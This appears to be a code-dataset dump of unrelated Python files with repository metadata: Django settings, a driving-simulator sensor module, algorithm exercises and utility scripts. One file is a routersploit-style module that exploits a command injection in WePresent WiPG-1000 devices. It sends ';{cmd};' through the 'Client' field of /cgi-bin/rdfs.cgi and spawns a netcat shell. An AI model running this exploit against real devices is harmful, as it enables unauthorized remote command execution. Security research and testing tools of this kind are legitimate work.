user_ids = [str(x) for x in range(1, 6)] + ["NOT_EXIST_USER"]
for user_id in user_ids:
print("Rank item 1 to 5 for user ", user_id)
try:
response = client.send_query({
"uid": user_id,
"iids": item_ids
})
print(response)
except predictionio.PredictionIOAPIError as e:
print("Caught exception: ", e)
client.close()
| 23.875 | 61 | 0.630017 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 163 | 0.284468 |
2bec0c607c3e98c35152779520d4098296b2008b | 226 | py | Python | key_server/key_management_system/apps.py | TV-Encryption/key_server | db243f3941cef82a9eb8f01bbb3fa72d7b32d77e | [
"MIT"
] | null | null | null | key_server/key_management_system/apps.py | TV-Encryption/key_server | db243f3941cef82a9eb8f01bbb3fa72d7b32d77e | [
"MIT"
] | null | null | null | key_server/key_management_system/apps.py | TV-Encryption/key_server | db243f3941cef82a9eb8f01bbb3fa72d7b32d77e | [
"MIT"
] | null | null | null | from django.apps import AppConfig
class KeyManagementSystemConfig(AppConfig):
default_auto_field = "django.db.models.BigAutoField"
name = "key_server.key_management_system"
verbose_name = "Key Management System"
| 28.25 | 56 | 0.787611 | 189 | 0.836283 | 0 | 0 | 0 | 0 | 0 | 0 | 88 | 0.389381 |
2beed0513a5ba2c61181277b03a553d3464d028b | 1,121 | py | Python | Interesting Python Questions/solve equation.py | liu-yunfei/Python | 314cdc98f32f4f0de2c0904279865b944e34dd75 | [
"MIT"
] | 1 | 2020-10-08T09:29:59.000Z | 2020-10-08T09:29:59.000Z | Interesting Python Questions/solve equation.py | liu-yunfei/Python | 314cdc98f32f4f0de2c0904279865b944e34dd75 | [
"MIT"
] | 1 | 2021-01-30T12:04:51.000Z | 2021-01-30T12:05:37.000Z | Interesting Python Questions/solve equation.py | liu-yunfei/Python | 314cdc98f32f4f0de2c0904279865b944e34dd75 | [
"MIT"
] | null | null | null | def f(x):
return ((2*(x**4))+(3*(x**3))-(6*(x**2))+(5*x)-8)
def reachEnd(previousm,currentm):
if abs(previousm - currentm) <= 10**(-6):
return True
return False
def printFormat(a,b,c,m,count):
print("Step %s" %count)
print("a=%.6f b=%.6f c=%.6f" %(a,b,c))
print("f(a)=%.6f f(b)=%.6f f(c)=%.6f" %(f(a),f(b),f(c)))
print("m=%.6f f(m)=%.6f" %(m,f(m)))
def main(a,b,c):
if (not (a < b and c < b)) or (not(f(a) > f(c) and f(b) > f(c))):
return False
count = 0
previousm = b+1
while True:
if (b - c) >= (c - a):
m = (b+c)/2
if f(m) >= f(c):
b = m
else:
a = c
c = m
else:
m = (a+c)/2
if f(m) >= f(c):
a = m
else:
b = c
c = m
printFormat(a,b,c,m,count)
if reachEnd(previousm,m):
print("Minimum value=%.6f occurring at %.6f" %(f(m),m))
break
previousm = m
count += 1
main(-3,-1,-2.2)
| 26.069767 | 70 | 0.373773 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 118 | 0.105263 |
2befdc8b109984b8d25e62dc78641cf77c167810 | 15,020 | py | Python | sensor.py | vorian77/driving_simulator | 92967eeeaa8cb789725fc89e77af2a80152708c0 | [
"MIT"
] | null | null | null | sensor.py | vorian77/driving_simulator | 92967eeeaa8cb789725fc89e77af2a80152708c0 | [
"MIT"
] | null | null | null | sensor.py | vorian77/driving_simulator | 92967eeeaa8cb789725fc89e77af2a80152708c0 | [
"MIT"
] | null | null | null | import obj as obj_lib
import road_artifact
import drive as drive_lib
import utilities as u
class Sensor(obj_lib.Obj):
"""
parent object class for car sensors
returns instruction
driving instruction - (heading, speed)
no driving instruction (no new process or process has completed) - None
arrived at destination - 'arrived'
"""
def __init__(self, pygame, screen):
super().__init__(pygame, screen)
self.classifiers = []
self.init_classifiers()
def add_classifier(self, object):
self.classifiers.append(object(self.pygame, self.screen))
def init_classifiers(self):
pass
def collect(self, status):
raw_data = self.retrieve(status)
for c in self.classifiers:
new_process = c.evaluate(status, raw_data)
if new_process:
return new_process
return None
def retrieve(self, status):
pass
def reset(self):
for c in self.classifiers:
c.reset()
class SensorSimulator(Sensor):
def __init__(self, pygame, screen):
super().__init__(pygame, screen)
def init_classifiers(self):
self.add_classifier(ClassiferSimulatorStationaryDestination)
self.add_classifier(ClassiferSimulatorStationarySignSpeed15)
self.add_classifier(ClassiferSimulatorStationarySignSpeed25)
self.add_classifier(ClassiferSimulatorStationarySignSpeed45)
self.add_classifier(ClassiferSimulatorStationarySignSpeed55)
self.add_classifier(ClassiferSimulatorStationarySignSpeed65)
self.add_classifier(ClassiferSimulatorStationarySignStop)
self.add_classifier(ClassiferSimulatorStationarySignTrafficLight)
self.add_classifier(ClassiferSimulatorMoveVehicle)
self.add_classifier(ClassiferSimulatorMovePedestrian)
def retrieve(self, status):
# return artifacts that the car has not passed
car = status['car']
road = status['location']['road']
artifacts = status['location']['road'].artifacts
car_bottom = car.gnav('midbottom')
visible_artifacts = []
for artifact in artifacts:
artifact_top = artifact.gnav('midtop')
if road.dir_val_exceeds(artifact_top, car_bottom):
visible_artifacts.append(artifact)
return visible_artifacts
class Classifier(obj_lib.Obj):
"""parent object class for sensor classifiers"""
def __init__(self, pygame, screen, activate_distance):
super().__init__(pygame, screen)
self.status = {}
self.activate_distance = activate_distance
self.activate_distance_buffer = 0
def evaluate(self, status, raw_data):
feature = self.extract(status, raw_data)
if not feature:
return None
if not self.activate(status, feature):
return None
return self.get_process(status, feature)
def extract(self, status, raw_data):
# if raw_data handled by classifier, then return structured data from raw data
pass
def status_is_inactive(self, id):
# if status for feature with id has not been set, set it to inactive
# otherwise, return true if feature with id's status is inactive
if id not in self.status:
self.status[id] = 'inactive'
return True
else:
return self.status[id] == 'inactive'
def status_set_active(self, feature):
# set the status for feature active
id = feature['id']
self.status[id] = 'active'
def status_set_inactive(self, feature):
# set the status for feature active
id = feature['id']
self.status[id] = 'inactive'
def status_set_complete(self, feature):
# set the status for feature to complete
id = feature['id']
self.status[id] = 'complete'
def activate(self, status, feature):
# return true if process for feature should be activated, false otherwise
pass
def get_process(self, status, feature):
self.status_set_active(feature)
data = self.get_process_data(status, feature)
return (data, self.process_function)
def get_process_data(self, status, feature):
return {'status': status, 'feature': feature}
def process_function(self, data):
pass
def send_instruction(self, car, heading, speed, text):
car.draw_outline(text)
return car.make_instruction(heading, speed)
def reset(self):
self.status = {}
class ClassifierSimulator(Classifier):
def __init__(self, pygame, screen, artifact_class, activate_distance, activate_pos):
super().__init__(pygame, screen, activate_distance)
self.activate_distance_buffer = 5 # length of car
self.artifact_class = artifact_class
self.activate_pos = activate_pos
self.status = {}
def get_artifact_id(self, artifact):
road_id = artifact.road.id
artifact_id = artifact.id
return (road_id, artifact_id)
def extract(self, status, raw_data):
for artifact in raw_data:
if isinstance(artifact, self.artifact_class):
if self.status_is_inactive(self.get_artifact_id(artifact)):
return self.extract_data(status, artifact)
return None
def extract_data(self, status, artifact):
feature = {'artifact': artifact, 'id': self.get_artifact_id(artifact)}
car = status['car']
road = status['location']['road']
# distance - difference between artifact position and bottom of the car
if self.activate_pos:
pos_artifact = artifact.gnav(self.activate_pos)
else:
# segment position
location_road = artifact.pos_parms['length_attribute_road']
pos_artifact = road.gnav(location_road)
pos_car = car.gnav('top')
feature['distance'] = (pos_artifact - pos_car) * road.graph_dir_length
feature['heading'] = u.heading(car.center, artifact.center)
# same_lane
# * none - artifact is not in a lane
# * True - artifact is in the same lane as the car
# * False - artifact is in a lane, but not the car's lane
artifact_lane_id = artifact.pos_width
if type(artifact_lane_id) is int:
feature['same_lane'] = artifact_lane_id == status['location']['lane'].lane_id
else:
feature['same_lane'] = None
return feature
def activate(self, status, feature):
same_lane = feature['same_lane']
if same_lane is False:
return False
return feature['distance'] <= (self.activate_distance + self.activate_distance_buffer)
def process_complete(self, feature):
pass
def in_collision_buffer(self, car, artifact):
return car.collision_buffer and not car.collision_buffer.is_clear([artifact])
class ClassiferSimulatorStationary(ClassifierSimulator):
def __init__(self, pygame, screen, artifact_class, activate_distance, activate_pos):
super().__init__(pygame, screen, artifact_class, activate_distance, activate_pos)
def process_complete(self, feature):
self.status_set_complete(feature)
class ClassiferSimulatorStationaryDestination(ClassiferSimulatorStationary):
def __init__(self, pygame, screen):
super().__init__(pygame, screen, road_artifact.ObjRoadArtifactStationaryDestination, 0, None)
def get_process_data(self, status, feature):
data = super().get_process_data(status, feature)
wait_time = 3 # seconds
data['complete'] = self.pygame.time.get_ticks() + (wait_time * 1000)
return data
def process_function(self, data):
car = data['status']['car']
ticks = self.pygame.time.get_ticks()
if ticks < data['complete']:
return self.send_instruction(car, None, 0, 'Waiting at destination')
else:
return 'arrived'
class ClassiferSimulatorStationarySignSpeed(ClassiferSimulatorStationary):
def __init__(self, pygame, screen, artifact_class, activate_distance, activate_pos, speed):
self.speed = speed
super().__init__(pygame, screen, artifact_class, activate_distance, activate_pos)
def process_function(self, data):
car = data['status']['car']
if car.speed != self.speed:
car.speed_prev = self.speed # allow temporary speed changes to be reset
return self.send_instruction(car, None, self.speed, f'Setting speed to: {self.speed}')
else:
feature = data['feature']
self.process_complete(feature)
class ClassiferSimulatorStationarySignSpeed15(ClassiferSimulatorStationarySignSpeed):
def __init__(self, pygame, screen):
super().__init__(pygame, screen, road_artifact.ObjRoadArtifactStationarySignSpeed15, 0, None, 15)
class ClassiferSimulatorStationarySignSpeed25(ClassiferSimulatorStationarySignSpeed):
def __init__(self, pygame, screen):
super().__init__(pygame, screen, road_artifact.ObjRoadArtifactStationarySignSpeed25, 0, None, 25)
class ClassiferSimulatorStationarySignSpeed45(ClassiferSimulatorStationarySignSpeed):
def __init__(self, pygame, screen):
super().__init__(pygame, screen, road_artifact.ObjRoadArtifactStationarySignSpeed45, 0, None, 45)
class ClassiferSimulatorStationarySignSpeed55(ClassiferSimulatorStationarySignSpeed):
def __init__(self, pygame, screen):
super().__init__(pygame, screen, road_artifact.ObjRoadArtifactStationarySignSpeed55, 0, None, 55)
class ClassiferSimulatorStationarySignSpeed65(ClassiferSimulatorStationarySignSpeed):
def __init__(self, pygame, screen):
super().__init__(pygame, screen, road_artifact.ObjRoadArtifactStationarySignSpeed65, 0, None, 65)
class ClassiferSimulatorStationarySignStop(ClassiferSimulatorStationary):
def __init__(self, pygame, screen):
super().__init__(pygame, screen, road_artifact.ObjRoadArtifactStationarySignStop, 0, None)
def get_process_data(self, status, feature):
data = super().get_process_data(status, feature)
wait_time = 3 # seconds
data['complete'] = self.pygame.time.get_ticks() + (wait_time * 1000)
return data
def process_function(self, data):
car = data['status']['car']
ticks = self.pygame.time.get_ticks()
if ticks < data['complete']:
return self.send_instruction(car, None, 0, 'Waiting at stop sign')
else:
car.restore_speed()
self.process_complete(data['feature'])
class ClassiferSimulatorStationarySignTrafficLight(ClassiferSimulatorStationary):
def __init__(self, pygame, screen):
super().__init__(pygame, screen, road_artifact.ObjRoadArtifactStationarySignTrafficLight, 0, None)
def process_function(self, data):
car = data['status']['car']
feature = data['feature']
artifact = feature['artifact']
if artifact.red:
return self.send_instruction(car, None, 0, 'Waiting at red traffic light')
else:
car.restore_speed()
self.process_complete(feature)
class ClassifierSimulatorMove(ClassifierSimulator):
def __init__(self, pygame, screen, artifact_class, activate_distance, activate_pos):
super().__init__(pygame, screen, artifact_class, activate_distance, activate_pos)
def process_complete(self, feature):
self.status_set_inactive(feature)
def status_set_inactive(self, data):
feature = data['feature']
return super().status_set_inactive(feature)
class ClassiferSimulatorMoveVehicle(ClassifierSimulatorMove):
def __init__(self, pygame, screen):
super().__init__(pygame, screen, road_artifact.ObjRoadArtifactMoveVehicle, 50, 'bottom')
def get_process_data(self, status, feature):
data = super().get_process_data(status, feature)
car = data['status']['car']
road = data['status']['location']['road']
artifact = feature['artifact']
if road.lane_cnt == 1:
# only 1 lane - match speed of car
data['type'] = 'single_lane'
data['artifact_pos'] = artifact.gnav('bottom')
else:
# select adjoining lane
data['type'] = 'multiple_lane'
car.set_collision_buffer_parms('top-front')
lane_id_current = status['location']['lane'].lane_id
if lane_id_current - 1 >= 0:
lane_id_new = lane_id_current - 1
else:
lane_id_new = lane_id_current + 1
# create drive guide
data['drive'] = drive_lib.DriveArcChangeLane(self.pygame, self.screen, car, road, lane_id_current, lane_id_new)
return data
def process_function(self, data):
def change_lane(data):
car = data['status']['car']
drive = data['drive']
target_heading = drive.get_heading(car)
if target_heading is not None:
return self.send_instruction(car, target_heading, car.speed_prev, f'Changing lane to avoid slow moving vehicle')
else:
return self.status_set_inactive(data)
def slow_down(data):
car = data['status']['car']
feature = data['feature']
artifact = feature['artifact']
distance = abs(artifact.gnav('bottom') - car.gnav('top'))
if self.activate_distance > distance:
pos_prev = data['artifact_pos']
pos_current = artifact.gnav('bottom')
speed = (pos_current - pos_prev) # speed is distance per clock cycle
data['artifact_pos'] = pos_current
return self.send_instruction(car, artifact.heading, speed, 'Reducing speed for slow vehicle')
else:
car.restore_speed()
return self.status_set_inactive(data)
## process_function()
if data['type'] == 'single_lane':
return slow_down(data)
else:
return change_lane(data)
class ClassiferSimulatorMovePedestrian(ClassifierSimulatorMove):
def __init__(self, pygame, screen):
super().__init__(pygame, screen, road_artifact.ObjRoadArtifactMovePedestrian, 18, 'bottom')
def activate(self, status, feature):
if not super().activate(status, feature):
return False
pedestrian = feature['artifact']
car = status['car']
return self.in_collision_buffer(car, pedestrian)
def process_function(self, data):
car = data['status']['car']
pedestrian = data['feature']['artifact']
if self.in_collision_buffer(car, pedestrian):
car.draw_collision_buffer()
return self.send_instruction(car, None, 0, 'Waiting for pedestrian')
else:
car.restore_speed()
return super().status_set_inactive(data)
| 37.363184 | 126 | 0.661119 | 14,881 | 0.990746 | 0 | 0 | 0 | 0 | 0 | 0 | 2,143 | 0.142676 |
2bf0f58a9e0436a17cd88f0338193b8408ef7d76 | 1,826 | py | Python | maza/modules/exploits/misc/wepresent/wipg1000_rce.py | ArturSpirin/maza | 56ae6325c08bcedd22c57b9fe11b58f1b38314ca | [
"MIT"
] | 2 | 2020-02-06T20:24:31.000Z | 2022-03-08T19:07:16.000Z | maza/modules/exploits/misc/wepresent/wipg1000_rce.py | ArturSpirin/maza | 56ae6325c08bcedd22c57b9fe11b58f1b38314ca | [
"MIT"
] | null | null | null | maza/modules/exploits/misc/wepresent/wipg1000_rce.py | ArturSpirin/maza | 56ae6325c08bcedd22c57b9fe11b58f1b38314ca | [
"MIT"
] | null | null | null | from maza.core.exploit import *
from maza.core.http.http_client import HTTPClient
class Exploit(HTTPClient):
__info__ = {
"name": "WePresent WiPG-1000 RCE",
"description": "Module exploits WePresent WiPG-1000 Command Injection vulnerability which allows "
"executing commands on operating system level.",
"authors": (
"Matthias Brun", # vulnerability discovery
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
"references": (
"https://www.redguard.ch/advisories/wepresent-wipg1000.txt",
),
"devices": (
"WePresent WiPG-1000 <=2.0.0.7",
),
}
target = OptIP("", "Target IPv4 or IPv6 address")
port = OptPort(80, "Target HTTP port")
def run(self):
if self.check():
print_success("Target seems to be vulnerable")
print_status("This is blind command injection, response is not available")
shell(self, architecture="mipsbe", binary="netcat", shell="/bin/sh")
else:
print_error("Exploit failed - exploit seems to be not vulnerable")
def execute(self, cmd):
payload = ";{};".format(cmd)
data = {
"Client": payload,
"Download": "Download"
}
self.http_request(
method="POST",
path="/cgi-bin/rdfs.cgi",
data=data
)
return ""
@mute
def check(self):
response = self.http_request(
method="GET",
path="/cgi-bin/rdfs.cgi"
)
if response is not None and "Follow administrator instructions to enter the complete path" in response.text:
return True # target vulnerable
return False # target is not vulnerable
| 30.433333 | 116 | 0.569003 | 1,741 | 0.95345 | 0 | 0 | 350 | 0.191676 | 0 | 0 | 802 | 0.439211 |
2bf2011196393733885cd4b7e26234b68e030539 | 212 | py | Python | solidity/install_solc.py | pdos-team/pdos | 7c96e36b4545d103cc56176197ec590fe2691344 | [
"MIT"
] | null | null | null | solidity/install_solc.py | pdos-team/pdos | 7c96e36b4545d103cc56176197ec590fe2691344 | [
"MIT"
] | null | null | null | solidity/install_solc.py | pdos-team/pdos | 7c96e36b4545d103cc56176197ec590fe2691344 | [
"MIT"
] | 1 | 2020-03-15T14:31:13.000Z | 2020-03-15T14:31:13.000Z | #!/usr/bin/env python3
import os
import sys
if os.getuid() != 0:
print ("Must be run as root, sorry.")
sys.exit(-1)
from solcx import install_solc_pragma
install_solc_pragma('>0.5.0 <0.6.0')
print ("Done.")
| 16.307692 | 38 | 0.683962 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 73 | 0.34434 |
2bf2e3db2a5c23652d59aea6af613c4b44bec6ab | 948 | py | Python | Medium/54_spiralOrder.py | a-shah8/LeetCode | a654e478f51b2254f7b49055beba6b5675bc5223 | [
"MIT"
] | 1 | 2021-06-02T15:03:41.000Z | 2021-06-02T15:03:41.000Z | Medium/54_spiralOrder.py | a-shah8/LeetCode | a654e478f51b2254f7b49055beba6b5675bc5223 | [
"MIT"
] | null | null | null | Medium/54_spiralOrder.py | a-shah8/LeetCode | a654e478f51b2254f7b49055beba6b5675bc5223 | [
"MIT"
] | null | null | null | class Solution:
def spiralOrder(self, matrix: List[List[int]]) -> List[int]:
result = []
rows, columns = len(matrix), len(matrix[0])
up = left = 0
right = columns-1
down = rows-1
while len(result) < rows*columns:
for col in range(left, right+1):
result.append(matrix[up][col])
for row in range(up+1, down+1):
result.append(matrix[row][right])
if up != down:
for col in range(right-1, left-1, -1):
result.append(matrix[down][col])
if left != right:
for row in range(down-1, up, -1):
result.append(matrix[row][left])
up += 1
down -= 1
left += 1
right -= 1
return result
| 29.625 | 64 | 0.405063 | 947 | 0.998945 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
2bf4bb3ef6684d55383ad1bf64b5a2a2127ffa99 | 1,028 | py | Python | SmoothAPI/proxy_handlers.py | technerium/SmoothAPI | 837fda1fd42f81138dad2484a91f51afe9b36f2f | [
"MIT"
] | null | null | null | SmoothAPI/proxy_handlers.py | technerium/SmoothAPI | 837fda1fd42f81138dad2484a91f51afe9b36f2f | [
"MIT"
] | null | null | null | SmoothAPI/proxy_handlers.py | technerium/SmoothAPI | 837fda1fd42f81138dad2484a91f51afe9b36f2f | [
"MIT"
] | null | null | null | class NoProxy:
def get(self, _):
return None
def ban_proxy(self, proxies):
return None
class RateLimitProxy:
def __init__(self, proxies, paths, default=None):
self.proxies = proxies
self.proxy_count = len(proxies)
self.access_counter = {
path: {"limit": paths[path], "count": 0} for path in paths.keys()
}
self.default = {"http": default, "https": default}
def get(self, keyword_arguments):
counter = self.access_counter.get(keyword_arguments["path"])
if counter is not None:
proxy = self.proxies[
(counter["count"] // counter["limit"] - self.proxy_count)
% self.proxy_count
]
counter["count"] += 1
return {"http": proxy, "https": proxy}
return self.default
def ban_proxy(self, proxies):
self.proxies = list(filter(lambda a: a not in [proxies.get("http", ''), proxies.get("https", '')], self.proxies))
return None
| 31.151515 | 121 | 0.570039 | 1,024 | 0.996109 | 0 | 0 | 0 | 0 | 0 | 0 | 84 | 0.081712 |
2bf4eed1a2461a7de84607671464c884ba1a974c | 3,301 | py | Python | backend/backend/settings/base.py | rrhg/react-django-docker-boilerplate | 760237e7503c25740a77eacb6249d538ea9ad0b0 | [
"MIT"
] | null | null | null | backend/backend/settings/base.py | rrhg/react-django-docker-boilerplate | 760237e7503c25740a77eacb6249d538ea9ad0b0 | [
"MIT"
] | null | null | null | backend/backend/settings/base.py | rrhg/react-django-docker-boilerplate | 760237e7503c25740a77eacb6249d538ea9ad0b0 | [
"MIT"
] | null | null | null | """
Base settings to build other settings files upon.
"""
import os
"""
Django settings for backend project.
Generated by 'django-admin startproject' using Django 3.1.4.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent.parent
BOILERPLATE_DIR = BASE_DIR.parent
# Apps used in both development & production
INSTALLED_APPS = [
'polls.apps.PollsConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'corsheaders',
'rest_framework',
]
# Middleware used in both development & production
MIDDLEWARE = [
'corsheaders.middleware.CorsMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'backend.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'backend.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
"default": {
"ENGINE": "django.db.backends.postgresql",
"NAME": os.environ.get("POSTGRES_DB"),
"USER": os.environ.get("POSTGRES_USER"),
"PASSWORD": os.environ.get("POSTGRES_PASSWORD"),
"HOST": os.environ.get("POSTGRES_HOST"),
"PORT": 5432,
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
# static files (django admin & rest_framework) will be copied here by collectstatic
STATIC_ROOT = './django-static/'
| 24.819549 | 91 | 0.688882 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,349 | 0.711603 |
2bf566fec30c9deeff3c69426f515c5625a28010 | 1,661 | py | Python | scripts/run-and-rename.py | mfs6174/Deep6174 | 92e2ceb48134e0cf003f130aef8d838a7a16c27d | [
"Apache-2.0"
] | null | null | null | scripts/run-and-rename.py | mfs6174/Deep6174 | 92e2ceb48134e0cf003f130aef8d838a7a16c27d | [
"Apache-2.0"
] | null | null | null | scripts/run-and-rename.py | mfs6174/Deep6174 | 92e2ceb48134e0cf003f130aef8d838a7a16c27d | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python2
# -*- coding: UTF-8 -*-
# File: run-and-rename.py
# Date: Thu Sep 18 15:43:36 2014 -0700
# Author: Yuxin Wu <ppwwyyxxc@gmail.com>
import numpy as np
from scipy.misc import imread, imsave
from itertools import izip
import sys, os
import shutil
import os.path
import glob
if len(sys.argv) != 3:
print "Usage: {0} <input directory with images> <model>".format(sys.argv[0])
sys.exit(0)
sys.path.insert(0, os.path.realpath(os.path.join(os.path.dirname(__file__), '../')))
from network_runner import NetworkRunner, get_nn
from lib.imageutil import get_image_matrix
from dataio import read_data
from lib.progress import Progressor
input_dir = sys.argv[1]
output_dir = os.path.join(input_dir, 'predicted')
shutil.rmtree(output_dir, ignore_errors=True)
os.mkdir(output_dir)
print "Reading images from {0}".format(input_dir)
print "Writing predicted results to {0}".format(output_dir)
model_file = sys.argv[2]
nn = get_nn(model_file)
print "Running network with model {0}".format(model_file)
# Run the network against a directory of images,
# and put predicted label in the filename
tot, corr = 0, 0
for f in glob.glob(input_dir + '/*'):
if not os.path.isfile(f):
continue
img = imread(f) / 255.0
pred = nn.predict(img)
label = f.split('-')[-1].split('.')[0]
new_fname = "{:04d}:{}-{},{}.png".format(tot, label, pred[0],
''.join(map(str, pred[1:])))
imsave(os.path.join(output_dir, new_fname), img)
tot += 1
corr += label == ''.join(map(str, pred[1:1+pred[0]]))
if tot > 0 and tot % 1000 == 0:
print "Progress:", tot
print corr, tot
| 27.229508 | 84 | 0.665262 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 440 | 0.264901 |
2bf76e6c71e2e4b130aa3da1d86af45c54dbc8eb | 261 | py | Python | Exercises/Exercise 15 - Hard.py | MikelShifrin/Python1 | 0096a327023a28e0c639042ae01268b07e61943e | [
"MIT"
] | 3 | 2019-07-02T13:46:23.000Z | 2019-08-19T14:41:25.000Z | Exercises/Exercise 15 - Hard.py | MikelShifrin/Python1 | 0096a327023a28e0c639042ae01268b07e61943e | [
"MIT"
] | null | null | null | Exercises/Exercise 15 - Hard.py | MikelShifrin/Python1 | 0096a327023a28e0c639042ae01268b07e61943e | [
"MIT"
] | null | null | null | #Assignment 12
#create 2 files on Desktop:
#input.txt
#output.txt
#inside input.txt write the following lines:
#apple
#orange
#banana
#cucumber
#Your program will add an s to each line
#and write it to output.txt
#Hint: name = 'hello\n'
# name.rstrip('\n') | 20.076923 | 44 | 0.720307 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 249 | 0.954023 |
2bf7cbd3af3aad19347edaabc6dc3814ebd7e30c | 950 | py | Python | wk8_hw/ex3_create_2_new_devs.py | philuu12/PYTHON_4_NTWK_ENGRS | ac0126ed687a5201031a6295d0094a536547cb92 | [
"Apache-2.0"
] | 1 | 2016-03-01T14:39:17.000Z | 2016-03-01T14:39:17.000Z | wk8_hw/ex3_create_2_new_devs.py | philuu12/PYTHON_4_NTWK_ENGRS | ac0126ed687a5201031a6295d0094a536547cb92 | [
"Apache-2.0"
] | null | null | null | wk8_hw/ex3_create_2_new_devs.py | philuu12/PYTHON_4_NTWK_ENGRS | ac0126ed687a5201031a6295d0094a536547cb92 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
"""
3. Create two new test NetworkDevices in the database. Use both direct
object creation and the .get_or_create() method to create the devices.
"""
from net_system.models import NetworkDevice
import django
def main():
django.setup()
brocade_rtr1 = NetworkDevice(
device_name='Brocade-rtr1',
device_type='fc_san',
ip_address='50.76.53.28',
port=8022,
)
hp_sw1 = NetworkDevice(
device_name='HP-sw1',
device_type='stratus',
ip_address='50.76.53.29',
port=8022,
)
# Save new device information in database
brocade_rtr1.save()
hp_sw1.save()
# Print out devices just added
for a_dev in (brocade_rtr1, hp_sw1):
print a_dev
print "Display devices in the database"
devices = NetworkDevice.objects.all()
for a_device in devices:
print a_device.device_name
if __name__ == "__main__":
main()
| 22.093023 | 71 | 0.649474 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 350 | 0.368421 |